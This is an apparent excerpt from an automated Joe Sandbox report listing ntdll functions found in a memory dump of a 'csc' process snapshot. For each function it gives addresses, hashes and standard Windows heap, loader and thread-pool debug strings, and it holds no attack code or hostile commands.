                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1975516107
                                                      • Opcode ID: 9e049fd6b7f3e9b16b299d208ac070e1945b46983025848f0df8bb95ea3f32e3
                                                      • Instruction ID: ec94207f9d8f389cb226f1dae87a3194f686ce426c47a2e9c4529974d971b677
                                                      • Opcode Fuzzy Hash: 9e049fd6b7f3e9b16b299d208ac070e1945b46983025848f0df8bb95ea3f32e3
                                                      • Instruction Fuzzy Hash: 6051F375A043859FDB19DF64D48A7EEBFB2BF44314F2449ADE4016B680C7B09C45CB80
                                                      Function 053976B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      • API String ID: 0-3061284088
                                                      • Opcode ID: 4cf1ce69119d3efd428d352a22f9f501b6b80c8c98975f8f33002c0adf56ef9a
                                                      • Instruction ID: 9ff848f0dbcade54e51432b3cf56c26bf5f440a69bfdc60c1ecc7c708bd3dff6
                                                      • Opcode Fuzzy Hash: 4cf1ce69119d3efd428d352a22f9f501b6b80c8c98975f8f33002c0adf56ef9a
                                                      • Instruction Fuzzy Hash: B801F076628285DFD63D971CE46EF62F7D4EB42E30F144059F10547991CBF85C81D660
                                                      Function 053B70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: ec82d90f90a7b8df020f4cfb71a60661a698859dcfb37c865340686052a996d3
                                                      • Instruction ID: 3dade955ca0a10afb84e2077a50b99c33f464e82dd1da98c0ff95aef58572dd4
                                                      • Opcode Fuzzy Hash: ec82d90f90a7b8df020f4cfb71a60661a698859dcfb37c865340686052a996d3
                                                      • Instruction Fuzzy Hash: F613AF70A04215DFEB25CF68C490BE9FBB6FF48304F148199D94AABB81D7B4A945CF90
                                                      Function 053B1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-3570731704
                                                      • Opcode ID: 8be90a0d3321ac2c4bec08604a66504696017c20789b6b5d3319012041b8e6d8
                                                      • Instruction ID: b3e63a41e492c801633a2f26745146450a11d330fe4c4dd53e75ac48c8957001
                                                      • Opcode Fuzzy Hash: 8be90a0d3321ac2c4bec08604a66504696017c20789b6b5d3319012041b8e6d8
                                                      • Instruction Fuzzy Hash: DC923771A04229CFEB24CB18C855FEAB7B6BF45310F1581EAE949A7790D7B09E80CF51
                                                      Function 053D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • @, xrefs: 053D8591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053D8421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 053D855E
                                                      • LdrpInitializeProcess, xrefs: 053D8422
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 002bc675c512c40847a8777affad1c299b16e3b69152f274f05637b114db23fe
                                                      • Instruction ID: 0313df2ae2ecb3d540165b73ec4525246b8b1927037139c4026d9dac75bfc896
                                                      • Opcode Fuzzy Hash: 002bc675c512c40847a8777affad1c299b16e3b69152f274f05637b114db23fe
                                                      • Instruction Fuzzy Hash: B9918E72A08345AFD722DF60D855EEBF6EDBF84784F40092EFA8496150E774E904CB62
                                                      Function 053D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • .Local, xrefs: 053D28D8
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 054121D9, 054122B1
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 054122B6
                                                      • SXS: %s() passed the empty activation context, xrefs: 054121DE
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 878d099125c7a5385396a438f85d09bdd727eafb1ffd3c807d231f3d23ec31bf
                                                      • Instruction ID: 70fdb4a35b2e65db03d5b377f28faa84e101f21cf1401ebb7c29cc6019b48916
                                                      • Opcode Fuzzy Hash: 878d099125c7a5385396a438f85d09bdd727eafb1ffd3c807d231f3d23ec31bf
                                                      • Instruction Fuzzy Hash: 6CA1B53A905229DBCB25CF55D884BEAB3B5BF58314F1401EAE809AB351D7709E81CFA4
                                                      Function 053A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 054010AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05400FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05401028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0540106B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: b7e8a11dc76834e0d245a52a8a68340106a40e25b78953866d6f589b260009f4
                                                      • Instruction ID: e229607a0a20d4715c724af7561955e38d8ee1a5b962b818c9ae6548924836b9
                                                      • Opcode Fuzzy Hash: b7e8a11dc76834e0d245a52a8a68340106a40e25b78953866d6f589b260009f4
                                                      • Instruction Fuzzy Hash: F67113B2A04314AFCB20EF14C889F977FA9EF44764F540469F9488B286D374D588CBD1
                                                      Function 0539F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      • API String ID: 0-2586055223
                                                      • Opcode ID: 4f90471d8aeb91968d9c985cd980297b1a17aee2b3727b52fc75e5acacaf6152
                                                      • Instruction ID: a2e53e6f256bf2a9ab6a92c28894a73fb1fce094628a0b54110952a003ff85d5
                                                      • Opcode Fuzzy Hash: 4f90471d8aeb91968d9c985cd980297b1a17aee2b3727b52fc75e5acacaf6152
                                                      • Instruction Fuzzy Hash: FC610372208381AFDB22DB68C848F67B7E9FF80714F040869FA55CB6A1C774D805D761
                                                      Function 054511A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      • API String ID: 0-336120773
                                                      • Opcode ID: 654eb0c69b77b3320b3f1737f926a80a776523bdc259d7e71205fd96a09f592e
                                                      • Instruction ID: 7e366b5d74e7253e20cc9549d236ae6933bfac46f7de19a081da197496ffdd9c
                                                      • Opcode Fuzzy Hash: 654eb0c69b77b3320b3f1737f926a80a776523bdc259d7e71205fd96a09f592e
                                                      • Instruction Fuzzy Hash: C4311432614115EFDB28DB98C885FA7B3E9FF04A70F540196F882EB292D670AC40CA65
                                                      Function 053C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0540A992
                                                      • apphelp.dll, xrefs: 053C2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0540A9A2
                                                      • LdrpDynamicShimModule, xrefs: 0540A998
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 5178173898f06cb725c96aa098f86a77a1ac88ec4b3b6cbde5d4ea7a43986bcc
                                                      • Instruction ID: ba2b369db21c13ff03d4d42b1be2f2531b3f5fa409515ccb5159d308c794eede
                                                      • Opcode Fuzzy Hash: 5178173898f06cb725c96aa098f86a77a1ac88ec4b3b6cbde5d4ea7a43986bcc
                                                      • Instruction Fuzzy Hash: 0831E976750301ABDB28DF5A9947EFB7BB5FB84B04F2644AEF80167290CB705941CB80
                                                      Function 05399148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      • API String ID: 0-1391187441
                                                      • Opcode ID: 144364b1d0f7c73af6b0f198430da6b8918226fc81f461ed2c0844b78174a1a9
                                                      • Instruction ID: 7c7543f7d4c365c45fed553adb7de5dd43e6244c85045c3724a078a36d348576
                                                      • Opcode Fuzzy Hash: 144364b1d0f7c73af6b0f198430da6b8918226fc81f461ed2c0844b78174a1a9
                                                      • Instruction Fuzzy Hash: F031B0B2A10209EFCF15DB49C899FAAF7F9FF45A20F144055E915AB290D7B0ED40CB60
                                                      Function 054494E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $0
                                                      • API String ID: 0-3352262554
                                                      • Opcode ID: 4170fab9c7be8308ca8bb21379c1055d6fe65d472155c454bc41dfb2b998634c
                                                      • Instruction ID: 128ccf9317eff47327a02e82b6efca108432cf978b26a7d4916e021a38700fb8
                                                      • Opcode Fuzzy Hash: 4170fab9c7be8308ca8bb21379c1055d6fe65d472155c454bc41dfb2b998634c
                                                      • Instruction Fuzzy Hash: A53213B16483818FE320CF68C484BABBBE5BB88344F04492EF59987350D775E949DF52
                                                      Function 053B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: cc07c11581753075d3e9ff920583d882b50c4ed87dfe5def09129a51bc34dd9e
                                                      • Instruction ID: 5e5693c23ca63607b804f22d8aacd59c967824a4ce6cf67e073e51b425273cfa
                                                      • Opcode Fuzzy Hash: cc07c11581753075d3e9ff920583d882b50c4ed87dfe5def09129a51bc34dd9e
                                                      • Instruction Fuzzy Hash: A4F17A70B00605DFEB19CF68C898BEAB7B6FF44300F2481A9E5169BB91D774A941CF91
                                                      Function 053A1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 053A1728
                                                      • HEAP: , xrefs: 053A1596
                                                      • HEAP[%wZ]: , xrefs: 053A1712
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: d66b12b3f5fec6bbe1b69e4170254a0722b95624364157b684aeccde635059a2
                                                      • Instruction ID: 4f1f01ed7c6a68e15a38f33091a61110f6ff4ae034b13f432bf3b2c32262967a
                                                      • Opcode Fuzzy Hash: d66b12b3f5fec6bbe1b69e4170254a0722b95624364157b684aeccde635059a2
                                                      • Instruction Fuzzy Hash: 77E10272A042459FDB29CF28C495BBABBF6FF88300F18845DE996CB685D774E844CB50
                                                      Function 053AB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                      • API String ID: 0-1145731471
                                                      • Opcode ID: 9892ba10e1b7e1409d4e1264f46ef26fd8bdce5ed175394d221e9448fdf30b46
                                                      • Instruction ID: 48f7ebd8f61888d7060c9bd03889a2505ce7b5f62a287b75bc3bf6f0fcd64f80
                                                      • Opcode Fuzzy Hash: 9892ba10e1b7e1409d4e1264f46ef26fd8bdce5ed175394d221e9448fdf30b46
                                                      • Instruction Fuzzy Hash: 73B19F33A086549BDB25CF59C990BAEBBF6FF44314F28496AE852DB780E774D840CB50
                                                      Function 0542368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      • API String ID: 0-2391371766
                                                      • Opcode ID: eae1d984cb69cdf31615f4eebd9a58ccd194c181f3933f8ff015421df7afd9ad
                                                      • Instruction ID: 86f88c4c6514cc5eab2220595a42289a2e2cd322b6badd04d93ed1eecd6967b6
                                                      • Opcode Fuzzy Hash: eae1d984cb69cdf31615f4eebd9a58ccd194c181f3933f8ff015421df7afd9ad
                                                      • Instruction Fuzzy Hash: E3B1AC72618365AFE721DF54C885FABB7F8BB44750F414D2AFA419B280D778E804CB92
                                                      Function 0539A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 6d7b67c686c705bea27427f5aacecfe34ac276bdad8b537b1b2c6e007b415725
                                                      • Instruction ID: ee2cbfe1d10cbec962637654566fbfc484b43209f95a610df43f0dffd8b99cfd
                                                      • Opcode Fuzzy Hash: 6d7b67c686c705bea27427f5aacecfe34ac276bdad8b537b1b2c6e007b415725
                                                      • Instruction Fuzzy Hash: 33A1677594522D9BDB359B64CC88BEAB7B8FF44700F1001EAEA09A7250D7759E84CF50
                                                      Function 054336EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      • API String ID: 0-318774311
                                                      • Opcode ID: 88b391f4d1174f76162ee2c779497472431159a7040da1c2e752a170e2053dab
                                                      • Instruction ID: 33c5c825ff7a94d87f5875784b8625644b06c5e4acf97679329a3cbcd6d2b36a
                                                      • Opcode Fuzzy Hash: 88b391f4d1174f76162ee2c779497472431159a7040da1c2e752a170e2053dab
                                                      • Instruction Fuzzy Hash: A7818971608340ABE315DF14C846BABBBE9BF88750F044D6AB9819B3A0E774D904CB62
                                                      Function 053AB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                      • API String ID: 0-373624363
                                                      • Opcode ID: 22289352d4adcb1c174e3d176a2c64e12f3359b79dd518cd62920143c84fbb4c
                                                      • Instruction ID: 3c36ecda3fe222f194a63e2b4c894b74196f80eba1e51b830219166d693f0f7e
                                                      • Opcode Fuzzy Hash: 22289352d4adcb1c174e3d176a2c64e12f3359b79dd518cd62920143c84fbb4c
                                                      • Instruction Fuzzy Hash: 2A91C172A08219CFDB25CF58C464BEEB7B5FF41314F24859AE852AB3D0D7B89940CB90
                                                      Function 053D909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      • API String ID: 0-1537733988
                                                      • Opcode ID: 5b554f783e060a3f7b6ab57bd7fe5918d0731c0d6d3d5f93419a5c28e90f6ca2
                                                      • Instruction ID: f4be9dd38ca10155c241186153320f9dcdbb085a0e793a6cff9465189fbc931f
                                                      • Opcode Fuzzy Hash: 5b554f783e060a3f7b6ab57bd7fe5918d0731c0d6d3d5f93419a5c28e90f6ca2
                                                      • Instruction Fuzzy Hash: C471AE726093059FC714DF20D984BABFBFABFC4618F108A1EE89A47651D730D905CBA6
                                                      Function 0547B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TargetNtPath, xrefs: 0547B82F
                                                      • GlobalizationUserSettings, xrefs: 0547B834
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0547B82A
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      • API String ID: 0-505981995
                                                      • Opcode ID: dc4e7d68b08b49a057827e70c4bdb1157ec4e7f7e87c6be03d1e53926058b4d6
                                                      • Instruction ID: b85fccef100ee13ff550df30a388068657e71557aca6819c00f3f0a8d0d31165
                                                      • Opcode Fuzzy Hash: dc4e7d68b08b49a057827e70c4bdb1157ec4e7f7e87c6be03d1e53926058b4d6
                                                      • Instruction Fuzzy Hash: 63613E7294162DABDB31DB54DC88BDAB7B9EF14710F0101EAE509AB250EB74DE84CF90
                                                      Function 0539F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP: , xrefs: 053FE6B3
                                                      • HEAP[%wZ]: , xrefs: 053FE6A6
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 053FE6C6
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      • API String ID: 0-1340214556
                                                      • Opcode ID: 5f8a2b775f5b462650701be44b9e4be21c28263a99160eb0897e71103a40a497
                                                      • Instruction ID: bfa306b7b936b3b3729e63eb26a2b17e564eaa063401986d162105d8a413a150
                                                      • Opcode Fuzzy Hash: 5f8a2b775f5b462650701be44b9e4be21c28263a99160eb0897e71103a40a497
                                                      • Instruction Fuzzy Hash: 2B51E371708644AFEB27DBA8C888FA6BBF9FF05700F0404A5E641CB692D7B4E940DB10
                                                      Function 053C15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0540A589
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0540A59A
                                                      • LdrpCompleteMapModule, xrefs: 0540A590
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: ca259b7ee8d7b691623dd9b4f65bc1110e7a4507849e52ac43be97963b646ae3
                                                      • Instruction ID: b5b06506b1c4ffc972eb2c952f13b00d2a1857d4eeccc80e73adc7f98c798508
                                                      • Opcode Fuzzy Hash: ca259b7ee8d7b691623dd9b4f65bc1110e7a4507849e52ac43be97963b646ae3
                                                      • Instruction Fuzzy Hash: D45111317047449BEB21DA69C948BAA7BE9BB00714F1809EAED529B7D2C7B4EC10D740
                                                      Function 053DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Failed to reallocate the system dirs string !, xrefs: 054182D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 054182DE
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 054182E8
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: 4e84ff2c68dcca540762ccac7959743e6e21793873b3ea629d336f5c702d03dc
                                                      • Instruction ID: 2186c6f52b342082d5ad87c727d7c408a9aeb1f5cb067cc926652c1c05dc6e8d
                                                      • Opcode Fuzzy Hash: 4e84ff2c68dcca540762ccac7959743e6e21793873b3ea629d336f5c702d03dc
                                                      • Instruction Fuzzy Hash: 5741C476664314EBD728EB64E84AB9BBBF8BF44650F00492AF945D7250EB70DC00CBA1
                                                      Function 0539758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                      • API String ID: 0-1151232445
                                                      • Opcode ID: 7a6011e395fbab6f871639ffbd12b5b60046760c83d89c7ee20f8495d30ee8b0
                                                      • Instruction ID: 19b1036de0021be274e08cef86de59bdbdb3145d92fec6b7a6bcc0b4806069e6
                                                      • Opcode Fuzzy Hash: 7a6011e395fbab6f871639ffbd12b5b60046760c83d89c7ee20f8495d30ee8b0
                                                      • Instruction Fuzzy Hash: AB4117B0324380AFDF2DCA1CC594BB97791FF02254F184469D54A8F686DAB4D845C771
                                                      Function 053D16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 05411B4A
                                                      • LdrpAllocateTls, xrefs: 05411B40
                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05411B39
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-4274184382
                                                      • Opcode ID: 1ea35e6436983c6008fa2504e4909e94902cb621d3a9137c4b484a3fcec98d31
                                                      • Instruction ID: afb0dbd422fdf86d1e07bfb1c16158cda4f3d89994384c3a18bb30dd444a479d
                                                      • Opcode Fuzzy Hash: 1ea35e6436983c6008fa2504e4909e94902cb621d3a9137c4b484a3fcec98d31
                                                      • Instruction Fuzzy Hash: 3D419AB6A00604AFDB15DFA8D845BEEFBF6FF88700F148519E506A7350D774A800CBA4
                                                      Function 0545C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • PreferredUILanguages, xrefs: 0545C212
                                                      • @, xrefs: 0545C1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0545C1C5
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
